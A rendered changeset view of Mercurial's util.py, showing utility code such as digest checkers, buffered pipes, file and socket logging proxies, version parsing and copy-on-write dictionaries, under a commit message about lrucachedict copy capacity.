util: ability to change capacity when copying lrucachedict...
Gregory Szorc
r39601:2dcc68c7 default
@@ -1,3885 +1,3898 @@
# util.py - Mercurial utility functions and platform specific implementations
#
# Copyright 2005 K. Thananchayan <thananck@yahoo.com>
# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.

"""Mercurial utility functions and platform specific implementations.

This contains helper routines that are independent of the SCM core and
hide platform-specific details from the core.
"""

from __future__ import absolute_import, print_function

import abc
import bz2
import collections
import contextlib
import errno
import gc
import hashlib
import itertools
import mmap
import os
import platform as pyplatform
import re as remod
import shutil
import socket
import stat
import sys
import time
import traceback
import warnings
import zlib

from .thirdparty import (
    attr,
)
from hgdemandimport import tracing
from . import (
    encoding,
    error,
    i18n,
    node as nodemod,
    policy,
    pycompat,
    urllibcompat,
)
from .utils import (
    procutil,
    stringutil,
)

base85 = policy.importmod(r'base85')
osutil = policy.importmod(r'osutil')
parsers = policy.importmod(r'parsers')

b85decode = base85.b85decode
b85encode = base85.b85encode

cookielib = pycompat.cookielib
httplib = pycompat.httplib
pickle = pycompat.pickle
safehasattr = pycompat.safehasattr
socketserver = pycompat.socketserver
bytesio = pycompat.bytesio
# TODO deprecate stringio name, as it is a lie on Python 3.
stringio = bytesio
xmlrpclib = pycompat.xmlrpclib

httpserver = urllibcompat.httpserver
urlerr = urllibcompat.urlerr
urlreq = urllibcompat.urlreq

# workaround for win32mbcs
_filenamebytestr = pycompat.bytestr

if pycompat.iswindows:
    from . import windows as platform
else:
    from . import posix as platform

_ = i18n._

bindunixsocket = platform.bindunixsocket
cachestat = platform.cachestat
checkexec = platform.checkexec
checklink = platform.checklink
copymode = platform.copymode
expandglobs = platform.expandglobs
getfsmountpoint = platform.getfsmountpoint
getfstype = platform.getfstype
groupmembers = platform.groupmembers
groupname = platform.groupname
isexec = platform.isexec
isowner = platform.isowner
listdir = osutil.listdir
localpath = platform.localpath
lookupreg = platform.lookupreg
makedir = platform.makedir
nlinks = platform.nlinks
normpath = platform.normpath
normcase = platform.normcase
normcasespec = platform.normcasespec
normcasefallback = platform.normcasefallback
openhardlinks = platform.openhardlinks
oslink = platform.oslink
parsepatchoutput = platform.parsepatchoutput
pconvert = platform.pconvert
poll = platform.poll
posixfile = platform.posixfile
rename = platform.rename
removedirs = platform.removedirs
samedevice = platform.samedevice
samefile = platform.samefile
samestat = platform.samestat
setflags = platform.setflags
split = platform.split
statfiles = getattr(osutil, 'statfiles', platform.statfiles)
statisexec = platform.statisexec
statislink = platform.statislink
umask = platform.umask
unlink = platform.unlink
username = platform.username

try:
    recvfds = osutil.recvfds
except AttributeError:
    pass

# Python compatibility

_notset = object()

def bitsfrom(container):
    bits = 0
    for bit in container:
        bits |= bit
    return bits

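# Illustrative note (not in the original source): bitsfrom ORs together all
# values in a container, e.g. bitsfrom([1, 2, 4]) == 7.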
# Python 2.6 still has deprecation warnings enabled by default. We do not want
# to display anything to standard users, so we detect if we are running tests
# and only use Python deprecation warnings in that case.
_dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
if _dowarn:
    # explicitly unfilter our warning for python 2.7
    #
    # The option of setting PYTHONWARNINGS in the test runner was investigated.
    # However, module name set through PYTHONWARNINGS was exactly matched, so
    # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
    # makes the whole PYTHONWARNINGS thing useless for our usecase.
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
if _dowarn and pycompat.ispy3:
    # silence warning emitted by passing user string to re.sub()
    warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
                            r'mercurial')
    warnings.filterwarnings(r'ignore', r'invalid escape sequence',
                            DeprecationWarning, r'mercurial')
    # TODO: reinvent imp.is_frozen()
    warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
                            DeprecationWarning, r'mercurial')

def nouideprecwarn(msg, version, stacklevel=1):
169 """Issue an python native deprecation warning
169 """Issue an python native deprecation warning

    This is a noop outside of tests, use 'ui.deprecwarn' when possible.
    """
    if _dowarn:
        msg += ("\n(compatibility will be dropped after Mercurial-%s,"
                " update your code.)") % version
        warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)

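# Illustrative usage (assumption, not in the original source): callers pass
# a bytes message and the version after which compatibility goes away; the
# warning only fires when HGEMITWARNINGS is set (i.e. under the test suite):
#
#     nouideprecwarn(b'use foo() instead of bar()', b'4.8')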
DIGESTS = {
    'md5': hashlib.md5,
    'sha1': hashlib.sha1,
    'sha512': hashlib.sha512,
}
# List of digest types from strongest to weakest
DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']

for k in DIGESTS_BY_STRENGTH:
    assert k in DIGESTS

class digester(object):
    """helper to compute digests.

    This helper can be used to compute one or more digests given their name.

    >>> d = digester([b'md5', b'sha1'])
    >>> d.update(b'foo')
    >>> [k for k in sorted(d)]
    ['md5', 'sha1']
    >>> d[b'md5']
    'acbd18db4cc2f85cedef654fccc4a4d8'
    >>> d[b'sha1']
    '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
    >>> digester.preferred([b'md5', b'sha1'])
    'sha1'
    """

    def __init__(self, digests, s=''):
        self._hashes = {}
        for k in digests:
            if k not in DIGESTS:
                raise error.Abort(_('unknown digest type: %s') % k)
            self._hashes[k] = DIGESTS[k]()
        if s:
            self.update(s)

    def update(self, data):
        for h in self._hashes.values():
            h.update(data)

    def __getitem__(self, key):
        if key not in DIGESTS:
            raise error.Abort(_('unknown digest type: %s') % key)
        return nodemod.hex(self._hashes[key].digest())

    def __iter__(self):
        return iter(self._hashes)

    @staticmethod
    def preferred(supported):
        """returns the strongest digest type in both supported and DIGESTS."""

        for k in DIGESTS_BY_STRENGTH:
            if k in supported:
                return k
        return None

class digestchecker(object):
    """file handle wrapper that additionally checks content against a given
    size and digests.

        d = digestchecker(fh, size, {'md5': '...'})

    When multiple digests are given, all of them are validated.
    """

    def __init__(self, fh, size, digests):
        self._fh = fh
        self._size = size
        self._got = 0
        self._digests = dict(digests)
        self._digester = digester(self._digests.keys())

    def read(self, length=-1):
        content = self._fh.read(length)
        self._digester.update(content)
        self._got += len(content)
        return content

    def validate(self):
        if self._size != self._got:
            raise error.Abort(_('size mismatch: expected %d, got %d') %
                              (self._size, self._got))
        for k, v in self._digests.items():
            if v != self._digester[k]:
                # i18n: first parameter is a digest name
                raise error.Abort(_('%s mismatch: expected %s, got %s') %
                                  (k, v, self._digester[k]))

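# Illustrative sketch (not part of the original module): a digestchecker
# wraps a file handle; callers read through it, then call validate() to
# confirm both size and digests match what was advertised. The file name
# here is hypothetical; the digest is sha1(b'foo') from the doctest above:
#
#     expected = {'sha1': '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'}
#     checker = digestchecker(open('payload.bin', 'rb'), 3, expected)
#     while checker.read(4096):
#         pass
#     checker.validate()  # raises error.Abort on size/digest mismatch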
try:
    buffer = buffer
except NameError:
    def buffer(sliceable, offset=0, length=None):
        if length is not None:
            return memoryview(sliceable)[offset:offset + length]
        return memoryview(sliceable)[offset:]

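# Illustrative note (assumption, not in the original source): on Python 3,
# where the builtin buffer() is gone, the fallback above returns a zero-copy
# memoryview slice, e.g.:
#
#     data = b'abcdef'
#     buffer(data, 2, 3)        # memoryview over b'cde', no copy made
#     bytes(buffer(data, 4))    # b'ef'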
_chunksize = 4096

class bufferedinputpipe(object):
    """a manually buffered input pipe

    Python will not let us use buffered IO and lazy reading with 'polling' at
    the same time. We cannot probe the buffer state and select will not detect
    that data are ready to read if they are already buffered.

    This class lets us work around that by implementing its own buffering
    (allowing efficient readline) while offering a way to know if the buffer is
    empty from the output (allowing collaboration of the buffer with polling).

    This class lives in the 'util' module because it makes use of the 'os'
    module from the python stdlib.
    """
    def __new__(cls, fh):
        # If we receive a fileobjectproxy, we need to use a variation of this
        # class that notifies observers about activity.
        if isinstance(fh, fileobjectproxy):
            cls = observedbufferedinputpipe

        return super(bufferedinputpipe, cls).__new__(cls)

    def __init__(self, input):
        self._input = input
        self._buffer = []
        self._eof = False
        self._lenbuf = 0

    @property
    def hasbuffer(self):
308 """True is any data is currently buffered
308 """True is any data is currently buffered
309
309
310 This will be used externally a pre-step for polling IO. If there is
310 This will be used externally a pre-step for polling IO. If there is
311 already data then no polling should be set in place."""
311 already data then no polling should be set in place."""
        return bool(self._buffer)

    @property
    def closed(self):
        return self._input.closed

    def fileno(self):
        return self._input.fileno()

    def close(self):
        return self._input.close()

    def read(self, size):
        while (not self._eof) and (self._lenbuf < size):
            self._fillbuffer()
        return self._frombuffer(size)

    def unbufferedread(self, size):
        if not self._eof and self._lenbuf == 0:
            self._fillbuffer(max(size, _chunksize))
        return self._frombuffer(min(self._lenbuf, size))

    def readline(self, *args, **kwargs):
        if 1 < len(self._buffer):
            # this should not happen because both read and readline end with a
            # _frombuffer call that collapses it.
            self._buffer = [''.join(self._buffer)]
            self._lenbuf = len(self._buffer[0])
        lfi = -1
        if self._buffer:
            lfi = self._buffer[-1].find('\n')
        while (not self._eof) and lfi < 0:
            self._fillbuffer()
            if self._buffer:
                lfi = self._buffer[-1].find('\n')
        size = lfi + 1
        if lfi < 0: # end of file
            size = self._lenbuf
        elif 1 < len(self._buffer):
            # we need to take previous chunks into account
            size += self._lenbuf - len(self._buffer[-1])
        return self._frombuffer(size)

    def _frombuffer(self, size):
        """return at most 'size' data from the buffer

        The data are removed from the buffer."""
        if size == 0 or not self._buffer:
            return ''
        buf = self._buffer[0]
        if 1 < len(self._buffer):
            buf = ''.join(self._buffer)

        data = buf[:size]
        buf = buf[len(data):]
        if buf:
            self._buffer = [buf]
            self._lenbuf = len(buf)
        else:
            self._buffer = []
            self._lenbuf = 0
        return data

    def _fillbuffer(self, size=_chunksize):
        """read data to the buffer"""
        data = os.read(self._input.fileno(), size)
        if not data:
            self._eof = True
        else:
            self._lenbuf += len(data)
            self._buffer.append(data)

        return data

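# Illustrative sketch (assumption, not in the original source): the
# hasbuffer property is what makes this class cooperate with select/poll.
# A caller drains buffered data first and only polls the fd when the
# buffer is known to be empty ('proc' here is a hypothetical subprocess):
#
#     import select
#     pipe = bufferedinputpipe(proc.stdout)
#     if not pipe.hasbuffer:
#         select.select([pipe.fileno()], [], [])
#     line = pipe.readline()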
def mmapread(fp):
    try:
        fd = getattr(fp, 'fileno', lambda: fp)()
        return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
    except ValueError:
        # Empty files cannot be mmapped, but mmapread should still work. Check
        # if the file is empty, and if so, return an empty buffer.
        if os.fstat(fd).st_size == 0:
            return ''
        raise

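# Illustrative usage (assumption, not in the original source): mmapread
# accepts either an open file object or a raw file descriptor, maps the
# whole file read-only, and falls back to '' for empty files:
#
#     with open('some-file', 'rb') as fp:    # hypothetical path
#         data = mmapread(fp)
#         header = data[:4]                  # sliced without reading it all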
class fileobjectproxy(object):
    """A proxy around file objects that tells a watcher when events occur.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """
    __slots__ = (
        r'_orig',
        r'_observer',
    )

    def __init__(self, fh, observer):
        object.__setattr__(self, r'_orig', fh)
        object.__setattr__(self, r'_observer', observer)

    def __getattribute__(self, name):
        ours = {
            r'_observer',

            # IOBase
            r'close',
            # closed is a property
            r'fileno',
            r'flush',
            r'isatty',
            r'readable',
            r'readline',
            r'readlines',
            r'seek',
            r'seekable',
            r'tell',
            r'truncate',
            r'writable',
            r'writelines',
            # RawIOBase
            r'read',
            r'readall',
            r'readinto',
            r'write',
            # BufferedIOBase
            # raw is a property
            r'detach',
            # read defined above
            r'read1',
            # readinto defined above
            # write defined above
        }

        # We only observe some methods.
        if name in ours:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, r'_orig'), name)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, r'_orig'))

    __bool__ = __nonzero__

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, r'_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, r'_orig'), name, value)

    def __iter__(self):
        return object.__getattribute__(self, r'_orig').__iter__()

    def _observedcall(self, name, *args, **kwargs):
        # Call the original object.
        orig = object.__getattribute__(self, r'_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, r'_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    def close(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'close', *args, **kwargs)

    def fileno(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'fileno', *args, **kwargs)

    def flush(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'flush', *args, **kwargs)

    def isatty(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'isatty', *args, **kwargs)

    def readable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readable', *args, **kwargs)

    def readline(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readline', *args, **kwargs)

    def readlines(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readlines', *args, **kwargs)

    def seek(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'seek', *args, **kwargs)

    def seekable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'seekable', *args, **kwargs)

    def tell(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'tell', *args, **kwargs)

    def truncate(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'truncate', *args, **kwargs)

    def writable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'writable', *args, **kwargs)

    def writelines(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'writelines', *args, **kwargs)

    def read(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'read', *args, **kwargs)

    def readall(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readall', *args, **kwargs)

    def readinto(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readinto', *args, **kwargs)

    def write(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'write', *args, **kwargs)

    def detach(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'detach', *args, **kwargs)

    def read1(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'read1', *args, **kwargs)

class observedbufferedinputpipe(bufferedinputpipe):
    """A variation of bufferedinputpipe that is aware of fileobjectproxy.

    ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
    bypass ``fileobjectproxy``. Because of this, we need to make
    ``bufferedinputpipe`` aware of these operations.

    This variation of ``bufferedinputpipe`` can notify observers about
    ``os.read()`` events. It also re-publishes other events, such as
    ``read()`` and ``readline()``.
    """
    def _fillbuffer(self):
        res = super(observedbufferedinputpipe, self)._fillbuffer()

        fn = getattr(self._input._observer, r'osread', None)
        if fn:
            fn(res, _chunksize)

        return res

    # We use different observer methods because the operation isn't
    # performed on the actual file object but on us.
    def read(self, size):
        res = super(observedbufferedinputpipe, self).read(size)

        fn = getattr(self._input._observer, r'bufferedread', None)
        if fn:
            fn(res, size)

        return res

    def readline(self, *args, **kwargs):
        res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)

        fn = getattr(self._input._observer, r'bufferedreadline', None)
        if fn:
            fn(res)

        return res

PROXIED_SOCKET_METHODS = {
    r'makefile',
    r'recv',
    r'recvfrom',
    r'recvfrom_into',
    r'recv_into',
    r'send',
    r'sendall',
    r'sendto',
    r'setblocking',
    r'settimeout',
    r'gettimeout',
    r'setsockopt',
}

class socketproxy(object):
    """A proxy around a socket that tells a watcher when events occur.

    This is like ``fileobjectproxy`` except for sockets.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """
    __slots__ = (
        r'_orig',
        r'_observer',
    )

    def __init__(self, sock, observer):
        object.__setattr__(self, r'_orig', sock)
        object.__setattr__(self, r'_observer', observer)

    def __getattribute__(self, name):
        if name in PROXIED_SOCKET_METHODS:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, r'_orig'), name)

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, r'_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, r'_orig'), name, value)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, r'_orig'))

    __bool__ = __nonzero__

    def _observedcall(self, name, *args, **kwargs):
        # Call the original object.
        orig = object.__getattribute__(self, r'_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, r'_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    def makefile(self, *args, **kwargs):
        res = object.__getattribute__(self, r'_observedcall')(
            r'makefile', *args, **kwargs)

        # The file object may be used for I/O. So we turn it into a
        # proxy using our observer.
        observer = object.__getattribute__(self, r'_observer')
        return makeloggingfileobject(observer.fh, res, observer.name,
                                     reads=observer.reads,
                                     writes=observer.writes,
                                     logdata=observer.logdata,
                                     logdataapis=observer.logdataapis)

    def recv(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recv', *args, **kwargs)

    def recvfrom(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recvfrom', *args, **kwargs)

    def recvfrom_into(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recvfrom_into', *args, **kwargs)

    def recv_into(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recv_into', *args, **kwargs)

    def send(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'send', *args, **kwargs)

    def sendall(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'sendall', *args, **kwargs)

    def sendto(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'sendto', *args, **kwargs)

    def setblocking(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'setblocking', *args, **kwargs)

    def settimeout(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'settimeout', *args, **kwargs)

    def gettimeout(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'gettimeout', *args, **kwargs)

    def setsockopt(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'setsockopt', *args, **kwargs)

class baseproxyobserver(object):
    def _writedata(self, data):
        if not self.logdata:
            if self.logdataapis:
                self.fh.write('\n')
                self.fh.flush()
            return

        # Simple case writes all data on a single line.
        if b'\n' not in data:
            if self.logdataapis:
                self.fh.write(': %s\n' % stringutil.escapestr(data))
            else:
                self.fh.write('%s> %s\n'
                              % (self.name, stringutil.escapestr(data)))
            self.fh.flush()
            return

        # Data with newlines is written to multiple lines.
        if self.logdataapis:
            self.fh.write(':\n')

        lines = data.splitlines(True)
        for line in lines:
            self.fh.write('%s> %s\n'
                          % (self.name, stringutil.escapestr(line)))
        self.fh.flush()

class fileobjectobserver(baseproxyobserver):
    """Logs file object activity."""
    def __init__(self, fh, name, reads=True, writes=True, logdata=False,
                 logdataapis=True):
        self.fh = fh
        self.name = name
        self.logdata = logdata
        self.logdataapis = logdataapis
        self.reads = reads
        self.writes = writes

    def read(self, res, size=-1):
        if not self.reads:
            return
        # Python 3 can return None from reads at EOF instead of empty strings.
        if res is None:
            res = ''

        if size == -1 and res == '':
            # Suppress pointless read(-1) calls that return
            # nothing. These happen _a lot_ on Python 3, and there
            # doesn't seem to be a better workaround to have matching
            # Python 2 and 3 behavior. :(
            return

        if self.logdataapis:
            self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))

        self._writedata(res)

    def readline(self, res, limit=-1):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> readline() -> %d' % (self.name, len(res)))

        self._writedata(res)

    def readinto(self, res, dest):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
                                                      res))

        data = dest[0:res] if res is not None else b''
        self._writedata(data)

    def write(self, res, data):
        if not self.writes:
            return

        # Python 2 returns None from some write() calls. Python 3 (reasonably)
        # returns the integer bytes written.
        if res is None and data:
            res = len(data)

        if self.logdataapis:
            self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))

        self._writedata(data)

    def flush(self, res):
        if not self.writes:
            return

        self.fh.write('%s> flush() -> %r\n' % (self.name, res))

    # For observedbufferedinputpipe.
    def bufferedread(self, res, size):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> bufferedread(%d) -> %d' % (
                self.name, size, len(res)))

        self._writedata(res)

    def bufferedreadline(self, res):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> bufferedreadline() -> %d' % (
                self.name, len(res)))

        self._writedata(res)

def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
                          logdata=False, logdataapis=True):
    """Turn a file object into a logging file object."""

    observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
                                  logdata=logdata, logdataapis=logdataapis)
    return fileobjectproxy(fh, observer)

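# Illustrative sketch (assumption, not in the original source): wrapping a
# file object routes every read/write through fileobjectobserver, which
# emits one log line per API call to the log handle. The file name is
# hypothetical:
#
#     proxied = makeloggingfileobject(sys.stderr, open('f', 'rb'), b'f',
#                                     logdata=True)
#     proxied.read(3)
#     # stderr receives something like: "f> read(3) -> 3: abc"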
class socketobserver(baseproxyobserver):
    """Logs socket activity."""
    def __init__(self, fh, name, reads=True, writes=True, states=True,
                 logdata=False, logdataapis=True):
        self.fh = fh
        self.name = name
        self.reads = reads
        self.writes = writes
        self.states = states
        self.logdata = logdata
        self.logdataapis = logdataapis

    def makefile(self, res, mode=None, bufsize=None):
        if not self.states:
            return

        self.fh.write('%s> makefile(%r, %r)\n' % (
            self.name, mode, bufsize))

    def recv(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recv(%d, %d) -> %d' % (
                self.name, size, flags, len(res)))
        self._writedata(res)

    def recvfrom(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
                self.name, size, flags, len(res[0])))

        self._writedata(res[0])

    def recvfrom_into(self, res, buf, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
                self.name, size, flags, res[0]))

        self._writedata(buf[0:res[0]])

    def recv_into(self, res, buf, size=0, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recv_into(%d, %d) -> %d' % (
                self.name, size, flags, res))

        self._writedata(buf[0:res])

    def send(self, res, data, flags=0):
        if not self.writes:
            return

        self.fh.write('%s> send(%d, %d) -> %d' % (
            self.name, len(data), flags, len(res)))
        self._writedata(data)

    def sendall(self, res, data, flags=0):
        if not self.writes:
            return

        if self.logdataapis:
            # Returns None on success. So don't bother reporting return value.
            self.fh.write('%s> sendall(%d, %d)' % (
                self.name, len(data), flags))

        self._writedata(data)

    def sendto(self, res, data, flagsoraddress, address=None):
        if not self.writes:
            return

        if address:
            flags = flagsoraddress
        else:
            flags = 0

        if self.logdataapis:
            self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
                self.name, len(data), flags, address, res))

        self._writedata(data)

    def setblocking(self, res, flag):
        if not self.states:
            return

        self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))

    def settimeout(self, res, value):
        if not self.states:
            return

        self.fh.write('%s> settimeout(%r)\n' % (self.name, value))

    def gettimeout(self, res):
        if not self.states:
            return

        self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))

    def setsockopt(self, res, level, optname, value):
        if not self.states:
            return

        self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
            self.name, level, optname, value, res))

def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
                      logdata=False, logdataapis=True):
    """Turn a socket into a logging socket."""

    observer = socketobserver(logh, name, reads=reads, writes=writes,
                              states=states, logdata=logdata,
                              logdataapis=logdataapis)
    return socketproxy(fh, observer)

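# Illustrative sketch (assumption, not in the original source): the socket
# variant mirrors makeloggingfileobject, and makefile() on the returned
# proxy hands back a logging file object that reuses the same observer
# settings:
#
#     sock = socket.create_connection(('example.com', 80))
#     logged = makeloggingsocket(sys.stderr, sock, b'client')
#     logged.sendall(b'HEAD / HTTP/1.0\r\n\r\n')
#     fh = logged.makefile(r'rb')   # also wrapped in a logging proxy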
968 def version():
968 def version():
969 """Return version information if available."""
969 """Return version information if available."""
970 try:
970 try:
971 from . import __version__
971 from . import __version__
972 return __version__.version
972 return __version__.version
973 except ImportError:
973 except ImportError:
974 return 'unknown'
974 return 'unknown'
975
975
def versiontuple(v=None, n=4):
    """Parses a Mercurial version string into an N-tuple.

    The version string to be parsed is specified with the ``v`` argument.
    If it isn't defined, the current Mercurial version string will be parsed.

    ``n`` can be 2, 3, or 4. Here is how some version strings map to
    returned values:

    >>> v = b'3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
    (3, 6, 1, '190-df9b73d2d444+20151118')

    >>> v = b'3.6'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, None)
    >>> versiontuple(v, 4)
    (3, 6, None, None)

    >>> v = b'3.9-rc'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc')

    >>> v = b'3.9-rc+2-02a8fea4289b'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc+2-02a8fea4289b')

    >>> versiontuple(b'4.6rc0')
    (4, 6, None, 'rc0')
    >>> versiontuple(b'4.6rc0+12-425d55e54f98')
    (4, 6, None, 'rc0+12-425d55e54f98')
    >>> versiontuple(b'.1.2.3')
    (None, None, None, '.1.2.3')
    >>> versiontuple(b'12.34..5')
    (12, 34, None, '..5')
    >>> versiontuple(b'1.2.3.4.5.6')
    (1, 2, 3, '.4.5.6')
    """
    if not v:
        v = version()
    m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
    if not m:
        vparts, extra = '', v
    elif m.group(2):
        vparts, extra = m.groups()
    else:
        vparts, extra = m.group(1), None

    vints = []
    for i in vparts.split('.'):
        try:
            vints.append(int(i))
        except ValueError:
            break
    # (3, 6) -> (3, 6, None)
    while len(vints) < 3:
        vints.append(None)

    if n == 2:
        return (vints[0], vints[1])
    if n == 3:
        return (vints[0], vints[1], vints[2])
    if n == 4:
        return (vints[0], vints[1], vints[2], extra)

def cachefunc(func):
    '''cache the result of function calls'''
    # XXX doesn't handle keyword args
    if func.__code__.co_argcount == 0:
        cache = []
        def f():
            if len(cache) == 0:
                cache.append(func())
            return cache[0]
        return f
    cache = {}
    if func.__code__.co_argcount == 1:
        # we gain a small amount of time because
        # we don't need to pack/unpack the list
        def f(arg):
            if arg not in cache:
                cache[arg] = func(arg)
            return cache[arg]
    else:
        def f(*args):
            if args not in cache:
                cache[args] = func(*args)
            return cache[args]

    return f

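# Illustrative sketch (not part of the module): cachefunc() memoizes on the
# positional argument tuple, so a wrapped function body runs once per
# distinct input. The counter below is an assumption for the example.
#
#   calls = [0]
#   def square(x):
#       calls[0] += 1
#       return x * x
#   square = cachefunc(square)
#   square(3); square(3)
#   assert calls[0] == 1   # the second call is served from the cache
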
class cow(object):
    """helper class to make copy-on-write easier

    Call preparewrite before doing any writes.
    """

    def preparewrite(self):
        """call this before writes, return self or a copied new object"""
        if getattr(self, '_copied', 0):
            self._copied -= 1
            return self.__class__(self)
        return self

    def copy(self):
        """always do a cheap copy"""
        self._copied = getattr(self, '_copied', 0) + 1
        return self

class sortdict(collections.OrderedDict):
    '''a simple sorted dictionary

    >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([(b'a', 2)])
    >>> list(d2.keys()) # should still be in last-set order
    ['b', 'a']
    '''

    def __setitem__(self, key, value):
        if key in self:
            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        def update(self, src):
            if isinstance(src, dict):
                src = src.iteritems()
            for k, v in src:
                self[k] = v

class cowdict(cow, dict):
    """copy-on-write dict

    Be sure to call d = d.preparewrite() before writing to d.

    >>> a = cowdict()
    >>> a is a.preparewrite()
    True
    >>> b = a.copy()
    >>> b is a
    True
    >>> c = b.copy()
    >>> c is a
    True
    >>> a = a.preparewrite()
    >>> b is a
    False
    >>> a is a.preparewrite()
    True
    >>> c = c.preparewrite()
    >>> b is c
    False
    >>> b is b.preparewrite()
    True
    """

class cowsortdict(cow, sortdict):
    """copy-on-write sortdict

    Be sure to call d = d.preparewrite() before writing to d.
    """

class transactional(object):
    """Base class for making a transactional type into a context manager."""
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

